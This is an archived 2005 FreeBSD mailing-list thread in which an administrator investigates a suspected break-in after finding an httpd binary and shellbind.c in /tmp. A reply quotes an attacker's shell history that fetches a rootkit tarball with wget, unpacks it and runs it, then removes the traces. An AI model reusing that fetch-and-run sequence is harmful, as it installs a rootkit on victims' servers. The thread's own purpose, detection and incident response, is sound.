Skip site navigation (1)Skip section navigation (2) 
Date:      Wed, 9 Feb 2005 11:41:26 -0600
From:      "Bret Walker" <bret-walker@northwestern.edu>
To:        "'Oliver Leitner'" <Shadow333@gmx.at>, <freebsd-questions@freebsd.org>
Subject:   RE: httpd in /tmp - Sound advice sought
Message-ID:  <042101c50ece$944bbad0$17336981@medill.northwestern.edu>
In-Reply-To: <20050209145353.304EC43D49@mx1.FreeBSD.org>
next in thread | previous in thread | raw e-mail | index | archive | help 

[-- Attachment #1 --]
Thanks for letting me know.

I found this in the my httpd error log:

[Fri Jan 14 13:06:06 2005] [error] [client 129.xxx.xxx.xxx] File does not
exist: /usr/local/www/data/favicon.ico
wget: permission denied
./httpd: not found
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from
pointer without a cast
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from
pointer without a cast
./httpd: permission denied
./httpd: permission denied
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from
pointer without a cast
./httpd: permission denied
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from
pointer without a cast
./httpd: permission denied
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from
pointer without a cast
[Fri Jan 14 21:40:12 2005] [error] [client 195.92.95.15] File does not
exist: /usr/local/www/data-dist/xyzzy
[Fri Jan 14 21:40:21 2005] [error] [client 195.92.95.15] File does not
exist: /usr/local/www/data-dist/xyzzy
[Sat Jan 15 21:36:33 2005] [error] [client 195.92.95.15] File does not
exist: /usr/local/www/data-dist/xyzzy
[Sun Jan 16 21:54:06 2005] [error] [client 195.92.95.15] File does not
exist: /usr/local/www/data-dist/xyzzy
[Sun Jan 16 23:58:22 2005] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?!] (System error follows)
[Sun Jan 16 23:58:22 2005] [error] System: Connection reset by peer
(errno: 54)

I also found shellbind.c in my /tmp directory.  Is there a way to tell
what type of exploit was used to get these files on my system (ie OpenSSL
/ PHP register_globals)?

I've been monitoring this server from a port that mirrors its traffic
using Ethereal, and all seems to be okay now.  I also cvsuped -Rr my
apache+mod_ssl install.

Thanks,
Bret

-----Original Message-----
From: owner-freebsd-questions@freebsd.org
[mailto:owner-freebsd-questions@freebsd.org] On Behalf Of Oliver Leitner
Sent: Wednesday, February 09, 2005 8:48 AM
To: Bret Walker; freebsd-questions@freebsd.org
Subject: Re: httpd in /tmp - Sound advice sought


i know a certain hacking group who is trying to run their trojan as httpd,
i
discovered that info through some shell account i am running, that has
tried
to start this rootkit on our machine.

heres a short view from the shell's history:

---------------------
wget geocities.com/setan_maya/taek.tar.gz
cd ..
ls
cd ..
ls
cd tmp
ls
wget geocities.com/setan_maya/taek.tar.gz
tar zxvf taek.tar.gz
ls
cd taek
./httpd
chmod 755 httpd
./httpd
ls
cd ..
rm -rf taek
rm taek.tar.gz
-----------------------

this clearly shows, that we have to do with a very dumb person, hence he

1. didnt cleaned his historyfile
2. left the tar.gz file in his homedir
3. loaded the rootkit from the same server he is running the group's
webpage
on.
4. has a link to their chan on that page, and in the chan as ive monitored

for 48hrs, ive found them posting their "successes" directly and
unencrypted.

I have informed a number of providers and hosters, that had their webpage
posted into that chan, and informed them about the breakins, so far i got
no
message back from them.

of course, its a longshot, but they didnt seem to check first if the
folder
tmp has the executable bit set at all, and they named their client like
the
file youve found.

i hope this helps you further.

Greetings
Oliver Leitner
Technical Staff
http://www.shells.at

On Tuesday 08 February 2005 14:35, Bret Walker wrote:
> Last night, I ran chkrootkit and it gave me a warning about being
> infected with Slapper.  Slapper exploits vulnerabilities in OpenSSL up
> to version 0.96d or older on Linux systems.  I have only run 0.97d.
> The file that set chkrootkit off was httpd which was located in /tmp.
> /tmp is always mounted rw, noexec.
>
> I update my packages (which are installed via ports) any time there is
> a security update.  I'm running Apache 1.3.33/PHP 4.3.10/mod_ssl
> 2.8.22/OpenSSL 0.97d on 4.10.  Register_globals was on in PHP for a
> couple of weeks, but the only code that required it to be on was in a
> .htaccess/SSL password protected directory.
>
> Tripwire didn't show anything that I noted as odd.  I reexamined the
> tripwire logs, which are e-mailed to an account off of the machine
> immediately after completion, and I don't
> see anything odd for the 3/4 days before or after the date on the file.
> (I don't scan /tmp)
>
> I stupidly deleted the httpd file from /tmp, which was smaller than
> the actual apache httpd.  And I don't back up /tmp.
>
> The only info I can find regarding this file being in /tmp pertains to
> Slapper.  Could something have copied a file there?  Could I have done
> it by mistake at some point - the server's been up ~60 days, plenty of
> time for me to forget something?
>
> This is production box that I very much want to keep up, so I'm
> seeking some sound advice.
>
> Does this box need to be rebuilt?  How could a file get written to
> /tmp, and is it an issue since it couldn't be executed?  I run
> tripwire nightly, and haven't seen anything odd to the best of my
> recollection.  I also check ipfstat -t frequently to see if any odd
> connections are happening.
>
> I appreciate any sound advice on this matter.
>
> Thanks,
> Bret

--
By reading this mail you agree to the following:

using or giving out the email address and any
other info of the author of this email is strictly forbidden. By acting
against this agreement the author of this mail
will take possible legal actions against the abuse.
_______________________________________________
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to
"freebsd-questions-unsubscribe@freebsd.org"

[-- Attachment #2 --]
0	*H
010	+0	*H
0a0ʠp0
	*H
0b10	UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA0
040727230335Z
050727230335Z0N10UThawte Freemail Member1+0)	*H
	bret-walker@northwestern.edu00
	*H
0جYs K76(ZµMfGRZ9,2^,Y:F닳t^R%qL	t! a.mSS|PұiAR,ÿ[)f/K΀9070'U 0bret-walker@northwestern.edu0U00
	*H
^!^4_K)ՙx--&Yj~g=֟lGxvd	>N{o$Ϲ5R\yIZ3Sj['&J6Yj=#/cfvәKAE*8Z0-00
	*H
010	UZA10UWestern Cape10U	Cape Town10U
Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0)	*H
	personal-freemail@thawte.com0
960101000000Z
201231235959Z010	UZA10UWestern Cape10U	Cape Town10U
Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0)	*H
	personal-freemail@thawte.com00
	*H
0i԰d[qGQr^}-
{߅%u(t:B,c'{K~ݹΖdnD|Mq@8x^^v]nz|KU)&j8$jDZڣyZ00U00
	*H
~Ngb*M`o`Xa&R5\0JbB#dG)ߝ^l`q\ynG
(|_#&	sC%/uQkw0?0
0
	*H
010	UZA10UWestern Cape10U	Cape Town10U
Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0)	*H
	personal-freemail@thawte.com0
030717000000Z
130716235959Z0b10	UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA00
	*H
0Ħ<UsUNʙZhup[v:aQP
0cZ,p+Z?qV˯<6$*+w=+>@dקe*TH<a@dr`00U00CU<0:08642http://crl.thawte.com/ThawtePersonalFreemailCA.crl0U0)U"0 010UPrivateLabel2-1380
	*H
HP.
fgCL!6-6/P p<ab:~t%Pb'qW%ݩ9 Oe_N4[5MwV!x!5$F]_eO100i0b10	UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CAp0	+0	*H
	1	*H
0	*H
	1
050209174126Z0#	*H
	1K]€ovC0g	*H
	1Z0X0
*H
0*H
0
*H
@0+0
*H
(0+0
*H
0x	+71k0i0b10	UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CAp0z*H
	1ki0b10	UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CAp0
	*H
/M9Wo'ؑ-bӦ}LTCVŀRsOZ(L@ٵCk\c`\mD%\jUʿ{&rЪMɘCI[7+GT-Q!

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?042101c50ece$944bbad0$17336981>